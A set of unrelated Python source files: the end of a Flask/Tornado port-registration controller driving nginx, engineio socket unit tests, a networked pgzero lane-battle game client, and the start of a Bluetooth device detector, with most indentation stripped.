return bad_request('Port must be an integer')
name = six.text_type(default_value(data.get("name"), default=port))
description = six.text_type(default_value(data.get("description"), default=""))
type = six.text_type(default_value(data.get("type"), default="tcp"))
with LOCK:
if port not in PORT_MANAGER.bound_ports:
return error_response('Port is not bound', HTTP_NOT_FOUND)
if PORT_MANAGER.get_by_port(port) is not None:
return bad_request("Port is already registered")
if PORT_MANAGER.get_by_name(name) is not None:
return bad_request("Name is already used")
return jsonify(PORT_MANAGER.register(port, name, type, description))
elif request.method == "DELETE":
with LOCK:
try:
port = int(port)
if port not in PORT_MANAGER.bound_ports:
return error_response('Port is not bound', HTTP_NOT_FOUND)
if not PORT_MANAGER.unregister_by_port(port):
return bad_request("Port is not registered")
except ValueError:
if not PORT_MANAGER.unregister_by_name(port):
return error_response('No port with name {}'.format(port), HTTP_NOT_FOUND)
return jsonify({})
@app.route("/api/debug/flask/", methods=["GET"])
@control_app.route("/api/debug/flask/", methods=["GET"])
def debug_flask():
    from six.moves.urllib.parse import unquote
output = ['Rules:']
for rule in current_app.url_map.iter_rules():
options = {}
for arg in rule.arguments:
options[arg] = "[{0}]".format(arg)
if rule.methods:
methods = ','.join(rule.methods)
else:
methods = 'GET'
url = url_for(rule.endpoint, **options)
        line = unquote("{:50s} {:20s} {}".format(rule.endpoint, methods, url))
output.append(line)
output.append('')
output.append('Request environment:')
for k, v in six.iteritems(request.environ):
output.append("{0}: {1}".format(k, pprint.pformat(v, depth=5)))
return Response('\n'.join(output), mimetype='text/plain')
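# Lets Tornado's AsyncHTTPClient talk to a unix domain socket: requests to the
# placeholder host 'unixsocket' resolve to the socket file instead of via DNS.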
class UnixResolver(Resolver):
def initialize(self, socket_file, resolver):
self.socket_file = socket_file
self.resolver = resolver
def close(self):
self.resolver.close()
@gen.coroutine
def resolve(self, host, port, *args, **kwargs):
if host == 'unixsocket':
raise gen.Return([(socket.AF_UNIX, self.socket_file)])
result = yield self.resolver.resolve(host, port, *args, **kwargs)
raise gen.Return(result)
def start_server(args):
from tornado.wsgi import WSGIContainer
from tornado.httpserver import HTTPServer
from tornado.ioloop import IOLoop
from tornado.netutil import bind_unix_socket
logging.info('Run on host %s:%i', args.host, args.port)
http_server = HTTPServer(WSGIContainer(app))
http_server.listen(args.port, args.host)
if args.control_unix_socket:
control_server = HTTPServer(WSGIContainer(control_app))
        unix_socket = bind_unix_socket(args.control_unix_socket, mode=0o666)
        control_server.add_socket(unix_socket)
logging.info('Run control server on unix socket %s', args.control_unix_socket)
global NGINX_TEMPLATE_GEN, PORT_MANAGER, LOCK
NGINX_TEMPLATE_GEN = NginxTemplateGenerator(nginx_port=args.nginx_port,
nginx_conf_file=args.nginx_conf_file,
nginx_pid_file=args.nginx_pid_file,
controller_port=args.port)
def nginx_regenerate_conf():
NGINX_TEMPLATE_GEN.generate(PORT_MANAGER)
NGINX_TEMPLATE_GEN.reload_nginx_config()
PORT_MANAGER = PortManager(port_registered_cb=lambda rport: nginx_regenerate_conf(),
port_unregistered_cb=lambda rport: nginx_regenerate_conf())
nginx_regenerate_conf()
def on_ports_changed(new_ports):
with LOCK:
PORT_MANAGER.update_accessible_ports(new_ports)
PortWatcher.start_instance(ports_changed_cb=on_ports_changed, wait_delay=args.wait_delay)
loop = IOLoop.current()
def stop_ioloop():
logging.info('Stopping IOLoop')
loop.stop()
def signal_term_handler(signal, frame):
print('Got signal {}, exiting'.format(signal), file=sys.stderr)
stop_ioloop()
sys.exit(0)
def on_exit():
if args.control_unix_socket:
os.unlink(args.control_unix_socket)
signal.signal(signal.SIGTERM, signal_term_handler)
signal.signal(signal.SIGINT, signal_term_handler)
atexit.register(on_exit)
loop.start()
def register_port(args):
from tornado import gen, ioloop
from tornado.httpclient import HTTPError
from tornado.httpclient import AsyncHTTPClient
import json
if not os.path.exists(args.control_unix_socket):
print("Socket file {} does not exist !".format(args.control_unix_socket), file=sys.stderr)
sys.exit(1)
@gen.coroutine
def do_register():
resolver = UnixResolver(socket_file=args.control_unix_socket, resolver=Resolver())
AsyncHTTPClient.configure(None, resolver=resolver)
client = AsyncHTTPClient()
mtype = 'application/json'
headers = {'Content-Type': mtype}
body = json.dumps({"name": args.name, "type": args.type, "description": args.description})
try:
response = yield client.fetch('http://unixsocket/ports/{}'.format(args.port),
method='PUT',
headers=headers,
body=body)
except HTTPError as he:
print("Could not register port: {}".format(he), file=sys.stderr)
sys.exit(1)
except Exception as e:
logging.exception("Could not register port")
sys.exit(1)
print(response.body)
ioloop.IOLoop.current().run_sync(do_register)
def unregister_port(args):
from tornado import gen, ioloop
from tornado.httpclient import HTTPError
from tornado.httpclient import AsyncHTTPClient
import json
if not os.path.exists(args.control_unix_socket):
print("Socket file {} does not exist !".format(args.control_unix_socket), file=sys.stderr)
sys.exit(1)
@gen.coroutine
def do_unregister():
resolver = UnixResolver(socket_file=args.control_unix_socket, resolver=Resolver())
AsyncHTTPClient.configure(None, resolver=resolver)
client = AsyncHTTPClient()
try:
response = yield client.fetch('http://unixsocket/ports/{}'.format(args.port),
method='DELETE')
except HTTPError as he:
print("Could not unregister port: {}".format(he), file=sys.stderr)
sys.exit(1)
except Exception as e:
logging.exception("Could not unregister port")
sys.exit(1)
print(response.body)
ioloop.IOLoop.current().run_sync(do_unregister)
def main():
# from tornado.options import define, options
#
# define("port", default=9090, help="listen on the given port", type=int)
# define("host", default="0.0.0.0", help="listen on the given host")
# define("control_unix_socket", default=DEFAULT_CONTROL_SOCKET_PATH, help="path to the control unix socket to bind")
# define("nginx_pid_file", default=DEFAULT_NGINX_PID_FILE, help="Location of nginx PID file")
# define("nginx_conf_file", default=DEFAULT_NGINX_CONF_FILE, help="Location of nginx conf file")
parser = argparse.ArgumentParser(
description="Connector Controller",
formatter_class=argparse.ArgumentDefaultsHelpFormatter
)
parser.add_argument("--debug", help='debug mode', action="store_true")
parser.add_argument("--control-unix-socket", default=DEFAULT_CONTROL_SOCKET_PATH,
help="path to the control unix socket to bind")
subparsers = parser.add_subparsers()
start_p = subparsers.add_parser('start', help='start server')
start_p.add_argument("-p", "--port", default=DEFAULT_PORT, help="listen on the given port", type=int)
start_p.add_argument("--host", default=DEFAULT_HOST, help="listen on the given host")
start_p.add_argument("--wait-delay", default=DEFAULT_WAIT_DELAY, help="wait delay in seconds between port checks")
start_p.add_argument("--nginx-port", default=DEFAULT_NGINX_PORT, help="nginx server port")
start_p.add_argument("--nginx-pid-file", default=DEFAULT_NGINX_PID_FILE, help="Location of nginx PID file")
start_p.add_argument("--nginx-conf-file", default=DEFAULT_NGINX_CONF_FILE, help="Location of nginx conf file")
start_p.set_defaults(func=start_server)
register_p = subparsers.add_parser('register', help='register port')
register_p.add_argument("port", help="port number", type=int)
register_p.add_argument("-n", "--name", default=None, help="port name")
register_p.add_argument("-t", "--type", default=None, help="port type")
register_p.add_argument("-d", "--description", default=None, help="port description")
register_p.set_defaults(func=register_port)
unregister_p = subparsers.add_parser('unregister', help='unregister port')
unregister_p.add_argument("port", help="port number or name")
unregister_p.set_defaults(func=unregister_port)
args = parser.parse_args()
args.func(args)
if __name__ == "__main__":
main()
|
test_socket.py
|
import time
import unittest
import six
if six.PY3:
from unittest import mock
else:
import mock
from engineio import exceptions
from engineio import packet
from engineio import payload
from engineio import socket
import pytest
class TestSocket(unittest.TestCase):
def setUp(self):
self.bg_tasks = []
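    # Build a mock engineio server whose async primitives are real threads and
    # queues, so Socket's background tasks actually run during these tests.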
def _get_mock_server(self):
mock_server = mock.Mock()
mock_server.ping_timeout = 0.2
mock_server.ping_interval = 0.2
mock_server.ping_interval_grace_period = 0.001
mock_server.async_handlers = True
try:
import queue
except ImportError:
import Queue as queue
import threading
mock_server._async = {
'threading': threading.Thread,
'queue': queue.Queue,
'websocket': None,
}
def bg_task(target, *args, **kwargs):
th = threading.Thread(target=target, args=args, kwargs=kwargs)
self.bg_tasks.append(th)
th.start()
return th
def create_queue(*args, **kwargs):
return queue.Queue(*args, **kwargs)
mock_server.start_background_task = bg_task
mock_server.create_queue = create_queue
mock_server.get_queue_empty_exception.return_value = queue.Empty
return mock_server
def _join_bg_tasks(self):
for task in self.bg_tasks:
task.join()
def test_create(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
assert s.server == mock_server
assert s.sid == 'sid'
assert not s.upgraded
assert not s.closed
assert hasattr(s.queue, 'get')
assert hasattr(s.queue, 'put')
assert hasattr(s.queue, 'task_done')
assert hasattr(s.queue, 'join')
def test_empty_poll(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
with pytest.raises(exceptions.QueueEmpty):
s.poll()
def test_poll(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
pkt1 = packet.Packet(packet.MESSAGE, data='hello')
pkt2 = packet.Packet(packet.MESSAGE, data='bye')
s.send(pkt1)
s.send(pkt2)
assert s.poll() == [pkt1, pkt2]
def test_poll_none(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
s.queue.put(None)
assert s.poll() == []
def test_poll_none_after_packet(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
pkt = packet.Packet(packet.MESSAGE, data='hello')
s.send(pkt)
s.queue.put(None)
assert s.poll() == [pkt]
assert s.poll() == []
def test_ping_pong(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
s.receive(packet.Packet(packet.PING, data='abc'))
r = s.poll()
assert len(r) == 1
        assert r[0].encode() == b'3abc'
def test_message_async_handler(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
s.receive(packet.Packet(packet.MESSAGE, data='foo'))
mock_server._trigger_event.assert_called_once_with(
'message', 'sid', 'foo', run_async=True
)
def test_message_sync_handler(self):
mock_server = self._get_mock_server()
mock_server.async_handlers = False
s = socket.Socket(mock_server, 'sid')
s.receive(packet.Packet(packet.MESSAGE, data='foo'))
mock_server._trigger_event.assert_called_once_with(
'message', 'sid', 'foo', run_async=False
)
def test_invalid_packet(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
with pytest.raises(exceptions.UnknownPacketError):
s.receive(packet.Packet(packet.OPEN))
def test_timeout(self):
mock_server = self._get_mock_server()
mock_server.ping_interval = 6
mock_server.ping_interval_grace_period = 2
s = socket.Socket(mock_server, 'sid')
s.last_ping = time.time() - 9
s.close = mock.MagicMock()
s.send('packet')
s.close.assert_called_once_with(wait=False, abort=False)
def test_polling_read(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'foo')
pkt1 = packet.Packet(packet.MESSAGE, data='hello')
pkt2 = packet.Packet(packet.MESSAGE, data='bye')
s.send(pkt1)
s.send(pkt2)
environ = {'REQUEST_METHOD': 'GET', 'QUERY_STRING': 'sid=foo'}
start_response = mock.MagicMock()
packets = s.handle_get_request(environ, start_response)
assert packets == [pkt1, pkt2]
def test_polling_read_error(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'foo')
environ = {'REQUEST_METHOD': 'GET', 'QUERY_STRING': 'sid=foo'}
start_response = mock.MagicMock()
with pytest.raises(exceptions.QueueEmpty):
s.handle_get_request(environ, start_response)
def test_polling_write(self):
mock_server = self._get_mock_server()
mock_server.max_http_buffer_size = 1000
pkt1 = packet.Packet(packet.MESSAGE, data='hello')
pkt2 = packet.Packet(packet.MESSAGE, data='bye')
p = payload.Payload(packets=[pkt1, pkt2]).encode()
s = socket.Socket(mock_server, 'foo')
s.receive = mock.MagicMock()
environ = {
'REQUEST_METHOD': 'POST',
'QUERY_STRING': 'sid=foo',
'CONTENT_LENGTH': len(p),
'wsgi.input': six.BytesIO(p),
}
s.handle_post_request(environ)
assert s.receive.call_count == 2
def test_polling_write_too_large(self):
mock_server = self._get_mock_server()
pkt1 = packet.Packet(packet.MESSAGE, data='hello')
pkt2 = packet.Packet(packet.MESSAGE, data='bye')
p = payload.Payload(packets=[pkt1, pkt2]).encode()
mock_server.max_http_buffer_size = len(p) - 1
s = socket.Socket(mock_server, 'foo')
s.receive = mock.MagicMock()
environ = {
'REQUEST_METHOD': 'POST',
'QUERY_STRING': 'sid=foo',
'CONTENT_LENGTH': len(p),
'wsgi.input': six.BytesIO(p),
}
with pytest.raises(exceptions.ContentTooLongError):
s.handle_post_request(environ)
def test_upgrade_handshake(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'foo')
s._upgrade_websocket = mock.MagicMock()
environ = {
'REQUEST_METHOD': 'GET',
'QUERY_STRING': 'sid=foo',
'HTTP_CONNECTION': 'Foo,Upgrade,Bar',
'HTTP_UPGRADE': 'websocket',
}
start_response = mock.MagicMock()
s.handle_get_request(environ, start_response)
s._upgrade_websocket.assert_called_once_with(environ, start_response)
def test_upgrade(self):
mock_server = self._get_mock_server()
mock_server._async['websocket'] = mock.MagicMock()
mock_ws = mock.MagicMock()
mock_server._async['websocket'].return_value = mock_ws
s = socket.Socket(mock_server, 'sid')
s.connected = True
environ = "foo"
start_response = "bar"
s._upgrade_websocket(environ, start_response)
mock_server._async['websocket'].assert_called_once_with(
s._websocket_handler
)
mock_ws.assert_called_once_with(environ, start_response)
def test_upgrade_twice(self):
mock_server = self._get_mock_server()
mock_server._async['websocket'] = mock.MagicMock()
s = socket.Socket(mock_server, 'sid')
s.connected = True
s.upgraded = True
environ = "foo"
start_response = "bar"
with pytest.raises(IOError):
s._upgrade_websocket(environ, start_response)
def test_upgrade_packet(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
s.connected = True
s.receive(packet.Packet(packet.UPGRADE))
r = s.poll()
assert len(r) == 1
assert r[0].encode() == packet.Packet(packet.NOOP).encode()
def test_upgrade_no_probe(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
s.connected = True
ws = mock.MagicMock()
ws.wait.return_value = packet.Packet(packet.NOOP).encode(
always_bytes=False
)
s._websocket_handler(ws)
assert not s.upgraded
def test_upgrade_no_upgrade_packet(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
s.connected = True
s.queue.join = mock.MagicMock(return_value=None)
ws = mock.MagicMock()
probe = six.text_type('probe')
ws.wait.side_effect = [
packet.Packet(packet.PING, data=probe).encode(always_bytes=False),
packet.Packet(packet.NOOP).encode(always_bytes=False),
]
s._websocket_handler(ws)
ws.send.assert_called_once_with(
packet.Packet(packet.PONG, data=probe).encode(always_bytes=False)
)
assert s.queue.get().packet_type == packet.NOOP
assert not s.upgraded
def test_close_packet(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
s.connected = True
s.close = mock.MagicMock()
s.receive(packet.Packet(packet.CLOSE))
s.close.assert_called_once_with(wait=False, abort=True)
def test_invalid_packet_type(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
pkt = packet.Packet(packet_type=99)
with pytest.raises(exceptions.UnknownPacketError):
s.receive(pkt)
def test_upgrade_not_supported(self):
mock_server = self._get_mock_server()
mock_server._async['websocket'] = None
s = socket.Socket(mock_server, 'sid')
s.connected = True
environ = "foo"
start_response = "bar"
s._upgrade_websocket(environ, start_response)
mock_server._bad_request.assert_called_once_with()
def test_websocket_read_write(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
s.connected = False
s.queue.join = mock.MagicMock(return_value=None)
foo = six.text_type('foo')
bar = six.text_type('bar')
s.poll = mock.MagicMock(
side_effect=[
[packet.Packet(packet.MESSAGE, data=bar)],
exceptions.QueueEmpty,
]
)
ws = mock.MagicMock()
ws.wait.side_effect = [
packet.Packet(packet.MESSAGE, data=foo).encode(always_bytes=False),
None,
]
s._websocket_handler(ws)
self._join_bg_tasks()
assert s.connected
assert s.upgraded
assert mock_server._trigger_event.call_count == 2
mock_server._trigger_event.assert_has_calls(
[
mock.call('message', 'sid', 'foo', run_async=True),
mock.call('disconnect', 'sid', run_async=False),
]
)
ws.send.assert_called_with('4bar')
def test_websocket_upgrade_read_write(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
s.connected = True
s.queue.join = mock.MagicMock(return_value=None)
foo = six.text_type('foo')
bar = six.text_type('bar')
probe = six.text_type('probe')
s.poll = mock.MagicMock(
side_effect=[
[packet.Packet(packet.MESSAGE, data=bar)],
exceptions.QueueEmpty,
]
)
ws = mock.MagicMock()
ws.wait.side_effect = [
packet.Packet(packet.PING, data=probe).encode(always_bytes=False),
packet.Packet(packet.UPGRADE).encode(always_bytes=False),
packet.Packet(packet.MESSAGE, data=foo).encode(always_bytes=False),
None,
]
s._websocket_handler(ws)
self._join_bg_tasks()
assert s.upgraded
assert mock_server._trigger_event.call_count == 2
mock_server._trigger_event.assert_has_calls(
[
mock.call('message', 'sid', 'foo', run_async=True),
mock.call('disconnect', 'sid', run_async=False),
]
)
ws.send.assert_called_with('4bar')
def test_websocket_upgrade_with_payload(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
s.connected = True
s.queue.join = mock.MagicMock(return_value=None)
probe = six.text_type('probe')
ws = mock.MagicMock()
ws.wait.side_effect = [
packet.Packet(packet.PING, data=probe).encode(always_bytes=False),
packet.Packet(packet.UPGRADE, data=b'2').encode(
always_bytes=False
),
]
s._websocket_handler(ws)
self._join_bg_tasks()
assert s.upgraded
def test_websocket_upgrade_with_backlog(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
s.connected = True
s.queue.join = mock.MagicMock(return_value=None)
probe = six.text_type('probe')
foo = six.text_type('foo')
ws = mock.MagicMock()
ws.wait.side_effect = [
packet.Packet(packet.PING, data=probe).encode(always_bytes=False),
packet.Packet(packet.UPGRADE, data=b'2').encode(
always_bytes=False
),
]
s.upgrading = True
s.send(packet.Packet(packet.MESSAGE, data=foo))
environ = {'REQUEST_METHOD': 'GET', 'QUERY_STRING': 'sid=sid'}
start_response = mock.MagicMock()
packets = s.handle_get_request(environ, start_response)
assert len(packets) == 1
assert packets[0].encode() == b'6'
packets = s.poll()
assert len(packets) == 1
assert packets[0].encode() == b'4foo'
s._websocket_handler(ws)
self._join_bg_tasks()
assert s.upgraded
assert not s.upgrading
packets = s.handle_get_request(environ, start_response)
assert len(packets) == 1
assert packets[0].encode() == b'6'
def test_websocket_read_write_wait_fail(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
s.connected = False
s.queue.join = mock.MagicMock(return_value=None)
foo = six.text_type('foo')
bar = six.text_type('bar')
s.poll = mock.MagicMock(
side_effect=[
[packet.Packet(packet.MESSAGE, data=bar)],
[packet.Packet(packet.MESSAGE, data=bar)],
exceptions.QueueEmpty,
]
)
ws = mock.MagicMock()
ws.wait.side_effect = [
packet.Packet(packet.MESSAGE, data=foo).encode(always_bytes=False),
RuntimeError,
]
ws.send.side_effect = [None, RuntimeError]
s._websocket_handler(ws)
self._join_bg_tasks()
assert s.closed
def test_websocket_ignore_invalid_packet(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
s.connected = False
s.queue.join = mock.MagicMock(return_value=None)
foo = six.text_type('foo')
bar = six.text_type('bar')
s.poll = mock.MagicMock(
side_effect=[
[packet.Packet(packet.MESSAGE, data=bar)],
exceptions.QueueEmpty,
]
)
ws = mock.MagicMock()
ws.wait.side_effect = [
packet.Packet(packet.OPEN).encode(always_bytes=False),
packet.Packet(packet.MESSAGE, data=foo).encode(always_bytes=False),
None,
]
s._websocket_handler(ws)
self._join_bg_tasks()
assert s.connected
assert mock_server._trigger_event.call_count == 2
mock_server._trigger_event.assert_has_calls(
[
mock.call('message', 'sid', foo, run_async=True),
mock.call('disconnect', 'sid', run_async=False),
]
)
ws.send.assert_called_with('4bar')
def test_send_after_close(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
s.close(wait=False)
with pytest.raises(exceptions.SocketIsClosedError):
s.send(packet.Packet(packet.NOOP))
def test_close_after_close(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
s.close(wait=False)
assert s.closed
assert mock_server._trigger_event.call_count == 1
mock_server._trigger_event.assert_called_once_with(
'disconnect', 'sid', run_async=False
)
s.close()
assert mock_server._trigger_event.call_count == 1
def test_close_and_wait(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
s.queue = mock.MagicMock()
s.close(wait=True)
s.queue.join.assert_called_once_with()
def test_close_without_wait(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
s.queue = mock.MagicMock()
s.close(wait=False)
assert s.queue.join.call_count == 0
|
gameClientNoGUI.py
|
# -*- coding: utf-8 -*-
# This is the game client without a GUI welcome screen; it runs without installing EasyGui
import pgzrun
import random
from pgzero.actor import Actor
from pgzero.rect import Rect, ZRect
from pgzero.screen import Screen
from backstageNoGUI import flag, game, waiting, ide, clicktime, tcpCliSock, account, target, connect, Game, Command, syncTimeCount
from Roadpos_set import road
from config import *
import threading
from time import sleep, time
from math import ceil
import sys
screen: Screen  # type annotation
# Upgrade button icon actors
upgradeIcon_main = Actor('upgrade')
upgradeIcon_up = Actor('upgrade')
upgradeIcon_mid = Actor('upgrade')
upgradeIcon_down = Actor('upgrade')
upgrade_button = [upgradeIcon_main, upgradeIcon_up,
upgradeIcon_mid, upgradeIcon_down]
# Health bar icon actors
player_icon = Actor('人图标')
life_frame = Actor('血框')
life_block = Actor('血块')
life_icon = Actor('生命值图标')
DenfenseTower_icon = Actor('防御塔图标')
Base_icon = Actor('主塔图标')
# Cloud/fog display actors
yun1 = Actor('云上')
yun1.topleft = 250, 0
yun2 = Actor('云上中')
yun2.topleft = 250, 0
yun3 = Actor('云中')
yun3.topleft = 250, 0
yun4 = Actor('云中下')
yun4.topleft = 250, 0
yun5 = Actor('云下')
yun5.topleft = 250, 0
# Money icon actors
money_0 = Actor('金钱框')
money_0.topleft = 975, 100
money_2 = Actor('钱币图标')
money_2.topleft = 975, 77
money_1 = Actor('金钱块')
# Display window size
WIDTH = 1200
HEIGHT = 700
# Unit-spawn buttons (70x70 px)
warrior_up = Actor('小兵', (70 + 960, 385))
archer_up = Actor('弓箭手', (166 + 960, 385))
warrior_mid = Actor('小兵', (70 + 960, 510))
archer_mid = Actor('弓箭手', (166 + 960, 510))
warrior_down = Actor('小兵', (70 + 960, 635))
archer_down = Actor('弓箭手', (166 + 960, 635))
def draw():
screen.clear()
screen.fill("white")
screen.blit('bk', (250, 0))
    # Money section
money_0.draw()
money_2.draw()
for i in range(game.money):
money_1.topleft = 978 + 20 * i, 103
money_1.draw()
screen.draw.text("Money:%d/10" % game.money, (1000, 82), color='black')
    # Barracks section
screen.blit('arsenal', (20 + 960, 190))
screen.blit('soldier', (21 + 960, 280))
warrior_up.draw()
archer_up.draw()
warrior_mid.draw()
archer_mid.draw()
warrior_down.draw()
archer_down.draw()
    # Units section
for r in range(3):
for w in game.w1[r]:
if w.wType == 1:
screen.blit('turret', (road[r][w.pos][w.wGrid]))
elif w.wType == 2:
screen.blit('knight' + str(ceil(10 * w.wLife /
KnightLife)), (road[r][w.pos][w.wGrid]))
elif w.wType == 3:
screen.blit('archer' + str(ceil(10 * w.wLife /
ArcherLife)), (road[r][w.pos][w.wGrid]))
for w in game.w2[r]:
if w.wType == 1:
screen.blit('turret', (road[r][w.pos][w.wGrid]))
elif w.wType == 2:
screen.blit('knighte' + str(ceil(10 * w.wLife /
KnightLife)), (road[r][w.pos][w.wGrid]))
elif w.wType == 3:
screen.blit('archere' + str(ceil(10 * w.wLife /
ArcherLife)), (road[r][w.pos][w.wGrid]))
    # Cloud/fog section
if game.life[6] > 0:
yun3.draw()
if game.life[5] > 0:
yun2.draw()
if game.life[7] > 0:
yun5.draw()
if game.life[5] > 0:
yun1.draw()
if game.life[7] > 0:
yun5.draw()
    # Health section
for j in range(8):
if j > 3:
dfx = 0
dfy = -640
else:
dfx = 0
dfy = 0
life_frame.topleft = 25 + dfx, 440 + j * 70 + dfy
life_icon.topleft = 24 + dfx, 421 + j * 70 + dfy
if j <= 3:
upgrade_button[j].topleft = 230 + dfx, 441 + j * 70 + dfy
upgrade_button[j].draw()
if j % 4 == 0:
Base_icon.topleft = 211+dfx, 416+j*70+dfy
Base_icon.draw()
screen.draw.text("Base", (170+dfx, 422+70*j+dfy), color='black')
else:
DenfenseTower_icon.topleft = 218+dfx, 417+j*70+dfy
DenfenseTower_icon.draw()
if (j-1) % 4 == 0:
screen.draw.text(
"Turret(top)", (138+dfx, 422+70*j+dfy), color='black')
elif (j-2) % 4 == 0:
screen.draw.text(
"Turret(mid)", (138+dfx, 422+70*j+dfy), color='black')
else:
screen.draw.text(
"Turret(bot)", (138+dfx, 422+70*j+dfy), color='black')
life_frame.draw()
life_icon.draw()
for i in range(game.life[j]):
if j % 4 == 0:
life_block.topleft = 27+2*i//3+dfx, 443+70*j+dfy
else:
life_block.topleft = 27+4*i//3+dfx, 443+70*j+dfy
life_block.draw()
if j % 4 == 0:
screen.draw.text(
"Life:%d/300" % game.life[j], (43+dfx, 422+70*j+dfy), color='black')
else:
screen.draw.text(
"Life:%d/150" % game.life[j], (43 + dfx, 422 + 70 * j + dfy), color='black')
player_icon.topleft = 27, 380
player_icon.draw()
player_icon.topleft = 27, 20
player_icon.draw()
screen.draw.text(
"player: %s" % ide[0], (52, 382), color='black', fontname='use', fontsize=20)
screen.draw.text("player: %s" %
ide[1], (52, 22), color='black', fontname='use', fontsize=20)
# Execute the matching command when the mouse clicks a specific position
def on_mouse_down(pos):  # unit spawning
global clicktime
if clicktime == 0:
clicktime = time()
elif clicktime != 0 and time() - clicktime < 0.3:
print("点的太快了!") # 限制点击频率避免同步异常
return
else:
clicktime = time()
order_command = Command(game.turnID + 30, -1, [0])
for i in range(4):
if i == 0:
if upgrade_button[i].collidepoint(pos) and game.money >= 10:
game.money -= 10
order_command.CmdType = 0
                order_command.turnID -= 10  # upgrades execute a bit faster than unit spawning
order_command.CmdStr = [0]
else:
if upgrade_button[i].collidepoint(pos) and game.money >= 5:
game.money -= 5
order_command.CmdType = 0
order_command.turnID -= 10
order_command.CmdStr = [i]
if warrior_up.collidepoint(pos) and game.money >= 2:
game.money -= 2
order_command.CmdType = 2
order_command.CmdStr = [1]
elif archer_up.collidepoint(pos) and game.money >= 3:
game.money -= 3
order_command.CmdType = 3
order_command.CmdStr = [1]
elif warrior_mid.collidepoint(pos) and game.money >= 2:
game.money -= 2
order_command.CmdType = 2
order_command.CmdStr = [2]
elif archer_mid.collidepoint(pos) and game.money >= 3:
game.money -= 3
order_command.CmdType = 3
order_command.CmdStr = [2]
elif warrior_down.collidepoint(pos) and game.money >= 2:
game.money -= 2
order_command.CmdType = 2
order_command.CmdStr = [3]
elif archer_down.collidepoint(pos) and game.money >= 3:
game.money -= 3
order_command.CmdType = 3
order_command.CmdStr = [3]
if order_command.CmdType >= 0:
game.ops1.put(order_command)
        game.sendCmd(target[0], order_command, 1)  # send the command to the opponent
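# pgzero calls update() once per frame; each frame runs one simulation turn:
# synchronize with the opponent, read queued commands, resolve battles and
# deaths, then move units, keeping both clients' simulations in step.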
def update(dt):
    # Initialize the turn
    game.update()
    # Synchronize
    waiting()
    flag[0] -= 1
    if flag[0] == 0:
        game.sendCmd(target[0], '', 0)
    # Read commands
    game.ReadCmd()
    # Check for possible battles
    game.BattleCheck()
    # Resolve battles
    game.BattleRun()
    # Settle warrior deaths
    game.WarriorDeath()
    # Move warriors
    for i in range(3):
        game.WarriorMove(game.w1[i], 1)
        game.WarriorMove(game.w2[i], 2)
    # Settle base-tower deaths
    result = game.BaseDeath()
    # If one side's base tower dies, start the endgame sequence
    # Redraw the screen
draw()
if result > 0:
for i in range(5):
            # Send the sync command a few extra times so the opponent displays the result correctly
game.sendCmd(target[0], '', 0)
sleep(0.2)
        msg = 'Game over, '
        if result == 1:
            msg += 'you win!'
        elif result == 2:
            msg += 'you lose!'
        tcpCliSock.close()
        print(msg)
        print('Goodbye!')
sys.exit(0)
def on_music_end():
music.play_once(random.choice(['东方_1', '东方_2']))
def startGame():
    # The game-start flow still needs more work
    connect()  # connect to the server
    # Account / nickname
    ide.append(str(account[0]))
    ide.append(str(target[0]))
    global game
    # Create a new game and initialize it
    game = Game()
    game.reset()
    # Open the communication interface
    getCmd = game.getCmd(game)  # command-receiving thread
    getCmd.start()
    game.sendCmd(target[0], '', 0)  # send a sync command to announce we are online
    waiting()  # wait for the opponent to come online
    print('Game started!')
    # Play music
    music.set_volume(0.3)
    music.play_once('bgm_1')
    # Start the game loop and the command-receiving thread together
    g = threading.Thread(target=pgzrun.go)  # game thread
g.start()
getCmd.join()
g.join()
startGame()
|
moteDetector.py
|
import bluetooth
import select
import time
import threading
import traceback
from moteCache import MoteCache
class SimpleDiscoverer(bluetooth.DeviceDiscoverer):
def __init__(self):
bluetooth.DeviceDiscoverer.__init__(self)
def pre_inquiry(self):
self.done = False
def device_discovered(self, address, device_class, name):
# print "%s - %s" % (address, name)
self.discoverCallback(address, device_class, name)
return
# get some information out of the device class and display it.
# voodoo magic specified at:
#
# https://www.bluetooth.org/foundry/assignnumb/document/baseband
major_classes = ( "Miscellaneous",
"Computer",
"Phone",
"LAN/Network Access point",
"Audio/Video",
"Peripheral",
"Imaging" )
major_class = (device_class >> 8) & 0xf
if major_class < 7:
print " %s" % major_classes[major_class]
else:
print " Uncategorized"
print " services:"
service_classes = ( (16, "positioning"),
(17, "networking"),
(18, "rendering"),
(19, "capturing"),
(20, "object transfer"),
(21, "audio"),
(22, "telephony"),
(23, "information"))
for bitpos, classname in service_classes:
if device_class & (1 << (bitpos-1)):
print " %s" % classname
def inquiry_complete(self):
self.done = True
class MoteDetector(): # just uses the simple class above from a bluetooth example.
def __init__(self, detectedCallback, getAlreadyConnectedIdsCallback, numToConnect=1):
self.detectedCallback = detectedCallback
